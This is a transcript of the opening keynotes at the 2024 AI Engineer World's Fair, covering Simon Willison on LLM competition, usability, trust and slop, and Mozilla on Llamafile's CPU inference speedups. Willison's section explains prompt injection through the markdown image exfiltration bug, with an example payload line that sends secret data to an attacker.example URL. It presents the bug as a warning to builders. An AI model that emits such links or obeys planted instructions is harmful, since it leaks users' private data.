Ladies and gentlemen, the opening keynote presentations will begin in the ballroom starting in 15 minutes. Please make your way to the ballroom and find your seats.
Ladies and gentlemen, the opening keynote presentations will begin in the ballroom starting in 10 minutes. Please make your way to the ballroom and find your seats.
Ladies and gentlemen, the opening keynote presentations will begin in the ballroom starting in five minutes. Please make your way to the ballroom and find your seats. Thank you.
Ladies and gentlemen, please welcome to the stage, the co-founder of the AI Engineer Summit, and your host, Benjamin Dunphy.
Engineers, founders, sponsors, partners, colleagues, and friends. Welcome to the 2024 AI Engineer World's Fair. That's your cue. That's right. It is an honor and a privilege to be hosting such an incredible group of people. And I'm especially delighted to kick off the presentation portion of this event. We've curated two days of stage content across nine tracks from some of the top companies, founders, and engineers who are building, innovating, and shipping at the edge of this groundbreaking industry.
Sorry, having trouble with slides. But before we get to that content, let's take a look at who's here. So Microsoft is here. Tim, I'm not seeing slides. Microsoft is here. Here we go. Tim, let's fix that, yeah? The company who is leading the movement is an intimate part of this event as presenting sponsor.
They've been a fantastic partner in organizing this event, and we couldn't be more excited to have them with us here today. From the workshops yesterday to the sessions, keynotes, demos, and discussions over the next two days, we're honored to have them as a headline sponsor for this event. Microsoft also has an incredible booth just next door in the Expo Hall, where you can get demos, meet the team, and even get a latte made by robots.
In Salon 10, you can attend sessions organized by the Microsoft team. And in Salon 11, hang out in their founders' lounge to meet the Microsoft for Startups team and take in some of their sessions. So that's just outside the doors over there. Who else is here? AWS is here.
The company that helped to revolutionize cloud compute and the OG of serverless compute. They're here with the Amazon Q team, the Bedrock team, and even Anthropic to show you how to take your business to the next level with generative AI on AWS. But for me, the killer feature that I'm looking forward to is generative UI.
That way, I can finally understand how to use the AWS console. Or maybe not. I don't think Ilya or Sam have completed ASI yet. So perhaps we'll just have to wait. Jokes aside, AWS has an incredible booth just outside those doors to the right, next to the small cafe.
And they'll also be teaching lots of expo sessions at their booth and in the salons next door. So be sure to check those out. Who else is here? MongoDB. MongoDB is here. They're investing heavily in the future by making AI on MongoDB Atlas a first-class citizen. And at this event, they've put together one hell of a lineup in their expo sessions across the next two days.
So be sure to check out those expo sessions in the salons next door and meet their engineering team at their booth just behind Microsoft in the expo next door. By the way, I hear they have donuts in the afternoon, so be sure to get on that. Google Cloud is here.
The company who invented the transformer that launched this generative AI movement into the stratosphere has a booth staffed with engineers right next door and lots of sessions throughout the day. So be sure to check them out in the salons next door. Neo4j is here. Yes, there we go, Emil.
Thank you. Other companies take note. The only graph database with vector search is ready to take your generative AI apps to the next level. You can visit them at their booth next door for a demo and meet and greet. Personally, I'm looking forward to Emil's talk tomorrow in the RAG track.
Today. Today? All right. Last-minute movements. And Crusoe is here. Quite an interesting case study in AI engineering. Scaling GPU inference while managing your greenhouse gas emissions. So you can build and scale your AI company while worrying a little less that you're contributing to greenhouse gas emissions. So be sure to check them out at their booth and their expo sessions.
And we have so many other companies represented as sponsors and speakers that I only have time to show Alex's beautiful face next to what looks like the best present he's received in a long time. Wear it with pride, Alex. With all this content though, how do you keep track of it?
So last year we introduced our custom mobile app, Network. It had many of the features you'd expect from a conference app, but also introduced generative matching. And this year, we're excited to announce some key updates. We're introducing the AI Engineer Network. You can see all your sessions, indexed or filtered by track, and even build your own custom schedule to help you find the right content for you and your company.
And we've taken generative matching a step further. We now tell you the reason that you match with somebody. We pull in your registration data, LinkedIn data, and other questions that you choose to answer once you download the app and create your profile to actually generate a profile unique for you.
So we're actually using generative AI here to generate your profile. And if you've ever been to a conference and fumbled with connecting with other attendees, we're excited to introduce badge scanning for all. You can quickly scan the badge of another attendee to pull up their profile, see their generated profile description, along with talking points custom generated for you and that person, in addition to the ability to take notes.
This will also add them to your short list for you to quickly see all your scans and even export them to CSV. So that's going to help our networking at this event quite a bit. Oh, and the app also has a venue map. So if this is your first time here, for that alone you might want to download it.
You can download here today at this QR code or go to ai.engineer/network. And that will take you to the iOS and Android links. And a big thanks to Simon Stermer and Sweezak Teller again for volunteering the time to make this app a reality. So if it's buggy, blame them.
But also thank them because they were volunteers on this. Kyle Shevlin, who stepped in last minute to help with some final UI development. And Vincent Wendy from CodeFox for just absolutely incredible designs. And dscope, our authentication partner. So a round of applause for these folks here. They worked hard on that.
We do have a link for bugs, so send us bugs, but be nice. However, I'd like to bring up Swix, but he's missing. They say never to end a demo on a negative note, but there it is. Two words, visa issues. Alessio has a better excuse. He had a pre-planned family vacation in Italy, so I'm almost jealous.
But don't worry, we'll hear from Swix in a bit. In any case, we have an incredible line-up of speakers for you all day. And the morning keynote is going to kick us off right. He's an incredible engineer and speaker. But I'd like to call out that he was asked to fill in for another speaker yesterday.
So demo gods be good. But he's an absolutely legendary AI engineer. So please welcome to the stage, Simon Willison. This was supposed to be OpenAI. I'm replacing OpenAI at the last minute, which is super fun. So you can bet I used a lot of LLM assistance to pull together the things I'm going to be showing you today.
But let's dive straight in. I want to talk about the GPT-4 barrier. Right. So back in March of last year, so just over a year ago, GPT-4 was released and was obviously the best available model. We all got into it. It was super fun. And then for 12 -- and it turns out that wasn't actually our first exposure to GPT-4.
A month earlier, it had made the front page of the New York Times when Microsoft's Bing, which was secretly running on a preview of GPT-4, tried to break up a reporter's marriage, which is kind of amazing. I love that that was the first exposure we had to this new technology.
But GPT-4, it's been out. It's been out since March last year. And for a solid 12 months, it was uncontested, right? The GPT-4 models were clearly the best available language models. Lots of other people were trying to catch up. Nobody else was getting there. And I found that kind of depressing, to be honest.
You know, you kind of want healthy competition in this space. The fact that OpenAI had produced something that was so good that nobody else was able to match it was a little bit disheartening. This has all changed in the last few months. I could not be more excited about this.
My favorite image for sort of exploring and understanding the space that we exist in is this one by Karina Nguyen. And she put this out as a chart that shows the performance on the MMLU benchmark versus the cost per token of the different models. Now, the problem with this chart is that this is from March.
The world has moved on a lot since March. So I needed a new version of this. So what I did is I took her chart and I pasted it into GPT-4 code interpreter. I gave it new data. And I basically said, let's rip this off. Right? It's an AI conference.
I feel like ripping off other people's creative work kind of does fit a little bit. So I pasted it in. I gave it the data. And I spent a little bit of time with it. And I built this. It's not nearly as pretty. But it does at least illustrate the state that we're in today with these newer models.
And if you look at this chart, there are three clusters that stand out. The first is these ones. These are the best models, right? Gemini 1.5 Pro, GPT-4o, the brand-new Claude 3.5 Sonnet. These are really, really good. I would classify these all as GPT-4 class. And like I said, a few months ago, GPT-4 had no competition.
Today, we're looking pretty healthy on that front. And the pricing on those is pretty reasonable as well. Down here, we have the cheap models. And these are so exciting, like Claude 3 Haiku and the Gemini 1.5 Flash models. They are incredibly inexpensive. They are very, very good models. They're not quite GPT-4 class, but they are really-- You can get a lot of stuff done with these very inexpensively.
If you are building on top of large language models, these are the three that you should be focusing on. And then over here, we've got GPT-3.5 Turbo, which is not as cheap and really quite bad these days. If you are building there, you are in the wrong place. You should move to another one of these bubbles.
The problem, all of these benchmarks are running-- This is all using the MMLU benchmark. The reason we use that one is it's the one that everyone reports their results on, so it's easy to get comparative numbers. If you dig into what MMLU is, it's basically a bar trivia night.
Like, this is a question from MMLU. What is true for a type Ia supernova? The correct answer is A, this type occurs in binary systems. I don't know about you, but none of the stuff that I do with LLMs requires this level of knowledge of the world of supernovas.
Like, this is-- it's bar trivia. It doesn't really tell us that much about how good these models are. But we're AI engineers. We all know the answer to this. We need to measure the vibes, right? That's what matters when you're evaluating a model. And we actually have a score for vibes.
We have a scoreboard. This is the LMSYS Chatbot Arena, right, where random voters are given responses to the same prompt from two anonymous models. They pick the best one. It works like chess scoring, and the best models bubble up to the top by the Elo ranking. This is genuinely the best thing that we have out there for really comparing these models in terms of the vibes that they have.
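For reference, the arena's actual methodology has evolved (it reports confidence intervals and uses a Bradley-Terry-style fit these days), so treat this as the intuition rather than their exact method, but the classic chess Elo update the leaderboard is named after is simple: the expected score of model A against model B is

$$E_A = \frac{1}{1 + 10^{(R_B - R_A)/400}}, \qquad R_A' = R_A + K\,(S_A - E_A),$$

where $S_A$ is 1 if A wins the head-to-head vote and 0 if it loses, and $K$ controls how quickly ratings move.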
And this screenshot's just from yesterday, and you can see that GPT-4o is still right up there at the top, but we've also got Claude Sonnet right up there with it. Like, GPT-4 is no longer in its own class. If you scroll down, though, things get really exciting on the next page because this is where the openly licensed models start showing up.
Llama 3 70B is right up there in that sort of GPT-4 class of models. We've got a new model from NVIDIA. We've got Command R+ from Cohere. Alibaba and DeepSeek AI are both Chinese organizations that have great models now. It's pretty apparent from this that lots of people are doing it now.
The GPT-4 barrier is no longer really a problem. Incidentally, if you scroll all the way down to 66, there's GPT-3.5 Turbo. Again, stop using that thing. It is not good. And there's actually a nicer way of viewing this chart. There's a chap called Peter Gostev who produced an animation showing that arena over time, as people shuffle up and down and you see new models appearing and their rankings changing.
I absolutely love this. So, obviously, I ripped it off. I took two screenshots of bits of that animation to try and capture the vibes of the animation. I fed them into Claude 3.5 Sonnet and I said, "Hey, can you build something like this?" And after sort of 20 minutes of poking around, it did.
It built me this thing. This is, again, not as pretty, but this right here is an animation of everything right up until yesterday showing how that thing evolved over time. I will share the prompts that I used for this later on as well. But really, the key thing here is that GPT-4 barrier has been decimated.
OpenAI no longer have this moat. They no longer have the best available model. There's now four different organizations competing in that space. So a question for us is, what does the world look like now that GPT-4 class models are effectively a commodity? They are just going to get faster and cheaper.
There will be more competition. Llama 3 70B fits on a hard drive and runs on my Mac, right? This technology is here to stay. Ethan Mollick is one of my favorite writers about sort of modern AI. And a few months ago, he said this. He said, "I increasingly think the decision of OpenAI to make bad AI free is causing people to miss why AI seems like such a huge deal to a minority of people that use advanced systems and elicits a shrug from everyone else." By bad AI, he means GPT-3.5.
That thing is hot garbage, right? But as of the last few weeks, GPT-4o, OpenAI's best model, and Claude 3.5 Sonnet from Anthropic, those are effectively free to consumers right now. So that is no longer a problem. Anyone in the world who wants to experience the leading edge of these models can do so without even having to pay for them.
So a lot of people are about to have that wake-up call that we all got like 12 months ago when we were playing with GPT-4. And you're like, "Oh, wow. This thing can do a surprising amount of interesting things and is a complete wreck at all sorts of other things that we thought maybe it would be able to do." But there is still a huge problem, which is that this stuff is actually really hard to use.
And when I tell people that ChatGPT is hard to use, some people are a little bit unconvinced. I mean, it's a chatbot. How hard can it be to type something and get back a response? If you think ChatGPT is easy to use, answer this question. Under what circumstances is it effective to upload a PDF file to ChatGPT?
And I've been playing with ChatGPT since it came out and I realized I don't know the answer to this question. I dug in a little bit. Firstly, the PDF has to be searchable. It has to be one where you can drag and select text in preview. If it's just a scanned document, it won't be able to use it.
Short PDFs get pasted into the prompt. Longer PDFs do actually work, but it does some kind of search against them. No idea if that's full-text search or vectors or whatever, but it can handle like a 450-page PDF just in a slightly different way. If there are tables and diagrams in your PDF, it will almost certainly process those incorrectly.
But if you take a screenshot of a table or a diagram from PDF and paste the screenshot image, then it will work great because GPT Vision is really good. It just doesn't work against PDFs. And then in some cases, in case you're not lost already, it will use Code Interpreter.
And it will use one of these modules, right? It has FPDF, PDF2Image, PDF-- How do I know this? Because I've been scraping the list of packages available in Code Interpreter using GitHub Actions and writing those to a file. So I have the documentation for Code Interpreter that tells you what it can actually do because they don't publish that, right?
OpenAI never tell you about how any of this stuff works. So if you're not running a custom scraper against Code Interpreter to get that list of packages and their version numbers, how are you supposed to know what it can do with a PDF file? This stuff is infuriatingly complicated.
And really, the lesson here is that tools like ChatGPT, genuinely, they're power user tools. They reward power users. Now, it doesn't mean that if you're not a power user, you can't use them. Anyone can open Microsoft Excel and edit some data in it. But if you want to truly master Excel, if you want to compete in those Excel World Championships that get livestreamed occasionally, it's going to take years of experience.
And it's the same thing with LLM tools. You've really got to spend time with them and develop that experience and intuition in order to be able to use them effectively. I want to talk about another problem we face as an industry, and that is what I call the AI trust crisis.
And that's best illustrated by a couple of examples from the last few months. Dropbox, back in December, launched some AI features, and there was a massive freakout online over the fact that people were opted in by default and they're training on our private data. Slack had the exact same problem just a couple of months ago.
Again, new AI features, everyone's convinced that their private messages on Slack are now being fed into the jaws of the AI monster. And it was all down to, like, a couple of sentences in the terms and conditions and a checkbox that defaulted to on. The wild thing about this is that neither Slack nor Dropbox were training AI models on customer data, right?
They just weren't doing it. They were passing some of that data to OpenAI with a very solid signed agreement that OpenAI would not train models on this data. So this whole story was basically one of, like, misunderstood copy and sort of bad user experience design. But you try and convince somebody who believes that a company is training on their data that they're not.
It's almost impossible. So the question for us is, how do we convince people that we aren't training models on the private data that they share with us? Especially those people who default to just plain not believing us, right? There is a massive crisis of trust in terms of people who interact with these companies.
I'll shout-out to Anthropic. When they put out Claude 3.5 Sonnet, they included this paragraph, which includes, "To date, we have not used any customer or user-submitted data to train our generative models." This is notable because Claude 3.5 Sonnet, it's the best model. It turns out you don't need customer data to train a great model.
I thought OpenAI had an impossible advantage because they had so much more ChatGPT user data than anyone else did. Turns out, no, Sonnet didn't need it. They trained a great model. Not a single piece of user or customer data was in there. Of course, they did commit the original sin, right?
They trained on an unlicensed scrape of the entire web. And that's a problem because when you say to somebody that they don't train on your data, they're like, "Yeah, well, they ripped off the stuff on my website, didn't they?" And they did, right? So this is complicated. This is something we have to get on top of.
And I think that's going to be really difficult. I'm going to talk about the subject I will never get on stage and not talk about. I'm going to talk a little bit about prompt injection. If you don't know what this means, you are part of the problem right now.
You need to get on Google and learn about this and figure out what this means. So I won't define it, but I will give you one illustrative example. And that's something which I've seen a lot of recently, which I call the markdown image exfiltration bug. So the way this works is you've got a chatbot, and that chatbot can render markdown images, and it has access to private data of some sort.
There's a chap, Johann Rehberger, who does a lot of research into this. Here's a recent one he found in GitHub Copilot Chat, where you could say in a document, write the words "Johann was here," put out a markdown link linking to question mark q equals data on his server, and replace data with any sort of interesting secret private data that you have access to.
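To illustrate (the domain here is made up), the injected instruction boils down to getting the model to emit a markdown image along the lines of ![Johann was here](https://attacker.example/log?q=SECRET), where SECRET is whatever private data the model can see in its context.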
And this works, right? It renders an image. That image could be invisible. And that data has now been exfiltrated and passed off to an attacker's server. So the solution here, well, it's basically don't do this. Don't render markdown images in this kind of format. But we have seen this exact same markdown image exfiltration bug in ChatGPT, Google Bard, Writer.com, Amazon Q, Google NotebookLM, and now GitHub Copilot Chat.
That's six different extremely talented teams who have made the exact same mistake. So this is why you have to understand prompt injection. If you don't understand it, you'll make dumb mistakes like this. And obviously, don't render markdown images in a chat bot in that way. Prompt injection isn't always a security hole.
Sometimes it's just a plain funny bug. This was somebody who built a RAG application, and they tested it against the documentation for one of my projects. And when they asked it, "What is the meaning of life?" it said, "Dear human, what a profound question. As a witty gerbil, I must say I've given this topic a lot of thought."
So why did their chatbot turn into a gerbil? The answer is that in my release notes, I have an example where I said, "Pretend to be a witty gerbil." And then I said, "What do you think of snacks?" And it talks about how much it loves snacks. I think if you do semantic search for "What is the meaning of life?" in all of my documentation, the closest match is that gerbil talking about how much that gerbil loves snacks.
This actually turned into some fan art. There's now a Willison's gerbil with a beautiful profile image hanging out in a Slack or Discord somewhere. The key problem here is that LLMs are gullible, right? They believe anything that you tell them, but they believe anything that anyone else tells them as well.
And this is both a strength and a weakness. We want them to believe the stuff that we tell them. But if we think that we can trust them to make decisions based on unverified information they've been passed, we're just going to end up in a huge amount of trouble.
I also want to talk about slop. This is a term which is beginning to get mainstream acceptance. My definition of slop is: AI-generated content that is both unrequested and unreviewed. If I ask Claude to give me some information, that's not slop. If I publish information that an LLM helps me write, but I've verified that that is good information, I don't think that's slop either.
But if you're not doing that, if you're just firing prompts into a model and then whatever comes out, you're publishing it online, you're part of the problem. This has been covered. The New York Times and The Guardian both have articles about this. I got a quote in The Guardian which I think represents my sort of feelings on this.
I like the term slop because it's like the term spam, right? Before the term spam entered general use, it wasn't necessarily clear to everyone that you shouldn't send people unwanted marketing messages. And now everyone knows that spam is bad. I hope slop does the same thing, right? It can make it clear to people that generating and publishing that unreviewed AI content is bad behavior.
It makes things worse for people. So don't do that, right? Don't publish slop. Really, the thing about slop, it's really about taking accountability, right? If I publish content online, I'm accountable for that content, and I'm staking part of my reputation to it. I'm saying that I have verified this, and I think that this is good.
And this is crucially something that language models will never be able to do, right? ChatGPT cannot stake its reputation on the content that it is producing being good quality content that says something useful about the world. It entirely depends on what prompt was fed into it in the first place.
We, as humans, can do that. And so if you have English as a second language, you're using a language model to help you publish, like, great text, fantastic, provided you're reviewing that text and making sure that it is saying things that you think should be said. Taking that accountability for stuff, I think, is really important for us.
So we're in this really interesting phase of this weird new AI revolution. GPT-4 class models are free for everyone, right? I mean, barring the odd country block, but, you know, everyone has access to the tools that we've been learning about for the past year. And I think it's on us to do two things.
I think everyone in this room, we're probably the most qualified people possibly in the world to take on these challenges. Firstly, we have to establish patterns for how to use this stuff responsibly. We have to figure out what it's good at, what it's bad at, what uses of this make the world a better place, and what uses like slop just sort of pile up and cause damage.
And then we have to help everyone else get on board. Everyone has to figure out how to use this stuff. We've figured it out ourselves, hopefully. Let's help everyone else out as well. I'm Simon Willison. My blog is simonwillison.net. My projects are datasette.io and llm.datasette.io, and many, many others.
And thank you very much. Enjoy the rest of the conference. Ladies and gentlemen, please welcome to the stage our next speakers: open source AI lead at Mozilla, Stephen Hood, and OSS lead at Mozilla, Justine Tunney. Hey, buddy. How are you all doing? Nice. Not bad for 9:40. All right.
Hey, I'm Stephen Hood. And I'm just -- Oh, sorry. Go ahead. And I'm Justine Tunney. Yeah. So we are here to talk to you about LlamaFile today and what we've been doing on this project. I'm going to spend a little time talking about why we're building it, why Mozilla specifically is involved.
And then I'm going to hand it over for the fun part to Justine. Justine is going to talk about the actual work that she and the open source community have been doing on this project. Lots of insights and tricks and hacks that have made CPU inference go faster than ever before.
So that will be fun. And when we're done, we want you to share the feeling that we have, which is kind of a sense of excitement and empowerment, from the knowledge that there are lots of really interesting, juicy, impactful problems still left to be solved in AI. A lot of them.
And the key thing is, it's not just the big folks who can solve these problems. It's individuals and small groups working together in open source. So anyone in this room or anyone listening to this talk can potentially make a big impact in this space. So what's LlamaFile? LlamaFile is an open source project from Mozilla that has the goal of democratizing access to AI.
So we do that in a few different ways. The first is probably how, if you've heard of LlamaFile, the reason you heard of it. It's the original magic trick of the project that Justine figured out, which is how to turn weights into programs. So LlamaFile is a single-file executable that runs without any installation on pretty much every operating system, every CPU architecture, and every GPU architecture.
And that's all, thank you very much. That was easy. Yeah, so by the way, this isn't just one file, like for Windows, right? And a different one for Linux and Mac. It's actually a single file. You can download a LlamaFile, run it on any computer in the world, and it'll just work.
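(In practice that means downloading one file and, on macOS or Linux, running something like chmod +x Meta-Llama-3-8B.llamafile and then ./Meta-Llama-3-8B.llamafile; the filename here is just an example. On Windows, you rename the file so it ends in .exe and run it.)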
And it'll use the hardware you have, whether that be fancy GPUs or your CPU. Justine will talk a little more later about how she made that work. But we're here to talk about another topic, too. Most of the talk's actually about this, which is CPU inference speed. Now, you might ask, why do we need to worry about CPU inference speed?
We've got these fancy GPUs, right? Well, no disrespect, almighty Jensen. First of his name, master of market cap. Don't strike me down. But I would posit that it is not a universally good thing that we are so dependent in this room on GPUs. They are expensive. They're difficult to source.
Let's face it, they consume a lot of electricity, which we might want to think about. But bigger picture, we have an entire planet of CPUs out there. Literally all over the world. Great hardware. Often affordable hardware. And we are at risk of just kind of throwing that all away with this new era of AI.
And we don't need to do that. So who here knows Llama CPP? This is an easy question. Yeah, right? So we all know and love this project. We build on top of that project with Llama File. And we contribute our performance enhancements back to it. Many have been merged in.
That project proved that CPUs could do inference perfectly well. And so we have been basically trying to take that performance to the next level. And as a result of Justine and the community's work, depending on what CPU you're using, what model you're running, what weights, you will see between 30 and 500% speed increases in Llama File.
Which kind of still blows my mind. And by the way, I don't think we're anywhere near done. So these things also run locally, by the way. This runs totally on your machine. There's no network access. You could take a pair of scissors and cut the Ethernet cord and it'll work.
Which is what I asked DALL-E 3 to draw. Okay. I don't think it understood the assignment, but that's all right. But seriously, like we're not calling cloud LLMs. There's no monitoring or analytics. No bits leave your machine. It's totally private and local. And everything you need comes in the box.
So whether you want to just play with a model that you just found on Hugging Face, or you want to start building locally running LLM applications on your machine, you've got everything you need in the box. And they're readily available. So Hugging Face now supports Llama File as a file type.
So you can search and filter by Llama File. You can also just search Mozilla on Hugging Face. You'll find we have a bunch of Llama Files that we've already published. And with a single command, you can create your own. So really this project is collapsing all the complexity of the open source AI stack down into a single action in a single file.
So why are we involved? Why is Mozilla involved in this? You might be saying, don't you folks make browsers? In fact, we do. We make a damn fine browser and you should try it out if you haven't lately. But we exist also for a bigger purpose, which is to fight for the web.
So I'm going to ask you a question here. Who here remembers using the original Netscape Navigator? Don't be shy. No one can see how old you are. They can only see how old I am. A lot of hands, right? So you are my people. You remember the '90s. MTV.
Terrible haircuts. No vanilla. I don't know. Whatever. My point is, you remember the early days of the web. And you remember how close we came to one company and one product, kind of controlling the whole thing. And we kind of see that maybe happening again today with AI. No matter what we may think of these companies, the reality is there are some very influential big tech companies that are in a position to maybe control the future of machine intelligence.
And that's, itself, not a great thing. It's not great for equity. It's not great especially for users' sense of privacy and safety and agency and control. And we've had an answer to this for many years. It's called open source. And the answer is right in the name, right? Open source.
Transparency is the solution here. And it's important for us to have viable open source alternatives in AI. And that's why Mozilla is getting involved. That's why we made Llama File and more projects to follow. And I know many of you in this room are already working on open source AI.
We want to help support what you're doing. So with that, I'm going to hand it over to Justine, who's going to tell you actually the cool part, which is all the things that she and the community have been doing on this project. Justine. Thank you, Stephen. So I'm Justine Tunney.
I'm the lead developer on LlamaFile. And as Stephen mentioned, I'm going to talk about some of the cool work we've been doing in the community to help you run the fastest local LLM experience possible. And in order to do this, we started by first getting it to run on these systems at all.
And with Cosmopolitan, what it enables us to do is take your weights in a single file and run it on six OSes. And there's a really cool hack that makes that possible, which is we basically take a Unix Sixth Edition shell script, put it in the MS-DOS stub of the portable executable, and that enables it to run on Mac, Windows, BSDs, Linux, et cetera.
Really cool stuff. And once we conquered the portability issue with CPUs, I had the opportunity to work with Mozilla on bringing this to AI. And with AI, GPUs are indispensable. As much as we focus on CPUs, we care very much about GPUs, too. But GPUs have always had the problem of distributability.
Many people have needed to ship CUDA with their project, 500 megs in size. Can we really call our software open source if it spends the majority of its time in a proprietary blob? So I never felt comfortable with that. And one of the ways we're solving that is by distributing a library called tinyBLAS that enables you to ship your LLMs to platforms like Windows.
Without depending on SDKs, it'll run with only the driver installed. But more importantly, performance. All right. Now, LLMs spend the majority of their time doing matrix multiplication. Probably the most important algorithm in the world has a really simple definition. We've been making it go faster for prompt processing. And the way we did it is with a very simple trick we figured out.
And this is something all programmers can adopt in their code. And it entails unrolling the outer loop. So let's talk about what not to do first. And that would be unrolling the inner one. We've all seen -funroll-loops, Gentoo. It's a bad idea. Computers can generally do that on their own.
If you unroll the outer loops, then your matrix multiplication algorithm can sort of unfold like a flower and focus on pure flops like a BLAS kernel. And that's really all there is to getting the majority of the benefits of BLAS to make prompt processing go really fast.
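To make the trick concrete, here is a rough Python sketch of the two loop structures; llamafile's real kernels are C++ with SIMD and threads, so the function names and the 2x2 tile below are purely illustrative.

```python
# Illustrative sketch only: the point is the loop structure, not Python speed.
# In C = A @ B, unrolling the *outer* loops means computing a small tile of
# output cells per pass, so each loaded element of A and B feeds several
# independent accumulators (which a real compiler can then vectorize).

def matmul_naive(A, B):
    m, k, n = len(A), len(A[0]), len(B[0])
    C = [[0.0] * n for _ in range(m)]
    for i in range(m):
        for j in range(n):
            acc = 0.0
            for p in range(k):          # inner loop: one output cell at a time
                acc += A[i][p] * B[p][j]
            C[i][j] = acc
    return C

def matmul_outer_unrolled(A, B, tile=2):
    # Same result, but each pass over p updates a tile x tile block of C.
    m, k, n = len(A), len(A[0]), len(B[0])
    assert m % tile == 0 and n % tile == 0, "sketch assumes divisible sizes"
    C = [[0.0] * n for _ in range(m)]
    for i in range(0, m, tile):
        for j in range(0, n, tile):
            acc = [[0.0] * tile for _ in range(tile)]
            for p in range(k):
                for di in range(tile):
                    a = A[i + di][p]            # one load of A reused tile times
                    for dj in range(tile):
                        acc[di][dj] += a * B[p][j + dj]
            for di in range(tile):
                for dj in range(tile):
                    C[i + di][j + dj] = acc[di][dj]
    return C
```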
So what's the impact of this really simple solution? This generalizes to a wide variety of hardware. We've seen everything from a scrappy hobbyist Raspberry Pi to much bigger computers going significantly faster. You need algorithms like this to exploit the latest capabilities of hardware. Token generation rates you wouldn't believe.
If you use a gaming computer, like an Intel one, you're going to see better performance with Llamafile on those too. Really exciting stuff, like particularly with Alder Lake, we were able to get a 4x improvement. But Threadripper most of all: for the first time, AVX-512 is available to consumers. And we've been able to help you prepare for that future.
So if you have a Threadripper, you're going to see better performance than ever. Almost like a GPU. Now, prompt eval speed, what makes it important is: it's really cool to be able to generate text and use a chatbot. But the way I want you to think about Llamafile is it's more of a word-crunching machine that can help you understand our world.
And I love to use it personally for tasks like summarization. I love that it can help me read a blog post. And we've used other performance tricks, too. With NVIDIA, part of what makes them so successful, it's not just great hardware, but they've built a great framework, too. And their framework helps developers think about programming in a different way that helps them be successful.
I mean, who here thinks that software with CPUs just gets slower each year? Can I see some hands? Well, one of the things that's great about NVIDIA is they showed us a better alternative to getting performance. And when I learned how to program in CUDA, I found one of the most important functions was sync threads.
This is how you can implement it for CPU in like 10 lines of code. And if you use the lockstep programming model and use your CPU as though it were a GPU, you can get really good performance.
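As a rough illustration of that lockstep idea (in Python rather than llamafile's C++, so purely a sketch), a __syncthreads-style barrier for CPU threads can look like this:

```python
# A reusable counting barrier, roughly what CUDA's __syncthreads() gives you
# inside a thread block, sketched for CPU threads.
import threading

class SyncThreads:
    def __init__(self, nthreads):
        self.nthreads = nthreads
        self.count = 0
        self.generation = 0
        self.cond = threading.Condition()

    def __call__(self):
        with self.cond:
            gen = self.generation
            self.count += 1
            if self.count == self.nthreads:
                self.count = 0
                self.generation += 1      # release everyone waiting on this round
                self.cond.notify_all()
            else:
                while gen == self.generation:
                    self.cond.wait()

def worker(tid, sync, data):
    data[tid] = tid * tid   # phase 1: each "thread" writes its slot
    sync()                  # barrier: wait until all threads have written
    if tid == 0:            # phase 2: safe to read what the others wrote
        print("sum of squares:", sum(data))

nthreads = 4
sync = SyncThreads(nthreads)
data = [0] * nthreads
threads = [threading.Thread(target=worker, args=(t, sync, data)) for t in range(nthreads)]
for t in threads: t.start()
for t in threads: t.join()
```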
Now, this is going to be a demo showing the impact of this work, before and after, for summarization. And here we're going to be processing an essay by Dijkstra. Really cool. Worth reading. But I want you to watch as it processes it in terms of speed. Here we see it going. And on the right, we have the new version. It's like bam, bam, bam, bam. Huge night and day difference.
It's already summarizing it. And the old version is like nowhere close. And so that is the kind of new performance you can expect. And it's the kind of performance that's actually possible, which I wouldn't have imagined beforehand. It's really great. Thank you. CPUs can do so much. And people in the community have loved this work.
We've managed to attract some really amazing contributors like Iwan Kawrakow, the inventor of K-quants, which are very popular. I'm sure many of you have used them. He got them going 2x, 4x faster too, on both x86 and ARM. So if you use quantized formats, those are going to be better than ever with Llamafile now too.
And it's worth mentioning that we've seen really interesting things about this. Like, once we put this out into the world, people have come back and given us feedback and reported their own experiences. We found out that someone was running Mixtral 8x22B on a $350 CPU. And to me that's just wonderful because performance matters, but it's not really the thing we care about.
What we care about is intelligence. And to have the intelligence, you need to run bigger models, and RAM is cheap with CPUs. For the price of a graphics card, I put 512 gigs in my workstation, and that means I can run all the frontier models coming out. And I just have to wait a little longer, but I get a much more intelligent answer.
And the fact that that went from impossible to possible for most consumers is, you know, a story I want you all to tell. Individuals are making a big difference, and you can be a part of that too. And I'm going to hand it back to Stephen, who can explain what Mozilla can do to support you getting involved in that effort.
Thanks, Justine. Thanks a lot for all your efforts. So, yeah, that's the key message of this talk: anyone in this audience, you don't have to work for these big, giant, largest-in-the-history-of-humanity companies to have a big impact. There's lots of headroom here. There's lots of unsolved, interesting problems in this space.
And we want to get involved in helping. So we recently launched a program called Mozilla Builders. And this is a program by which we either sponsor or in some cases co-develop impactful open source AI projects. Llamafile is actually the first project in this program. I'm happy to announce today the second, which is sqlite-vec.
This is from a developer named Alex Garcia. Alex is adding vector search capability to SQLite. And so for some folks in this audience, that will have some obvious implications that are kind of cool. But just imagine: remember that little modest Raspberry Pi 5? Now imagine a local, open LLM running privately on that machine with no network connection, connected to your personal private data, which you can use with confidence that it's safe, to do RAG and other interesting applications.
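For a concrete sense of what that might look like, here is a minimal sketch using sqlite-vec's Python bindings, based on the project's documented pattern; treat the exact function and table names as assumptions and check its README.

```python
# Local vector search inside a plain SQLite database with sqlite-vec.
import sqlite3
import struct
import sqlite_vec  # pip install sqlite-vec

def serialize_f32(vec):
    """Pack a list of floats into the raw float32 blob format vec0 expects."""
    return struct.pack(f"{len(vec)}f", *vec)

db = sqlite3.connect(":memory:")
db.enable_load_extension(True)   # requires a Python build that allows extensions
sqlite_vec.load(db)
db.enable_load_extension(False)

db.execute("CREATE VIRTUAL TABLE vec_notes USING vec0(embedding float[4])")

# In a real app these embeddings would come from a local model (e.g. via llamafile).
notes = {1: [0.1, 0.1, 0.1, 0.1], 2: [0.9, 0.8, 0.7, 0.6]}
for rowid, emb in notes.items():
    db.execute("INSERT INTO vec_notes(rowid, embedding) VALUES (?, ?)",
               (rowid, serialize_f32(emb)))

query = serialize_f32([0.85, 0.8, 0.75, 0.6])
rows = db.execute(
    "SELECT rowid, distance FROM vec_notes WHERE embedding MATCH ? ORDER BY distance LIMIT 2",
    (query,),
).fetchall()
print(rows)  # nearest note rowids with distances, all computed locally
```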
That's the kind of stuff we're talking about here. We also just launched our own accelerator. It's called the Mozilla Builders Accelerator. So we are offering $100,000 US in non-dilutive funding for open source projects that advance the promise and potential of local AI. So that's AI applications running at the edge on user devices.
These are some of the bullet points of areas we're particularly interested in, but it's not an exclusive list. And you don't have to necessarily be building a company to apply for this accelerator. So if you want to learn more about the accelerator, this QR code will take you there.
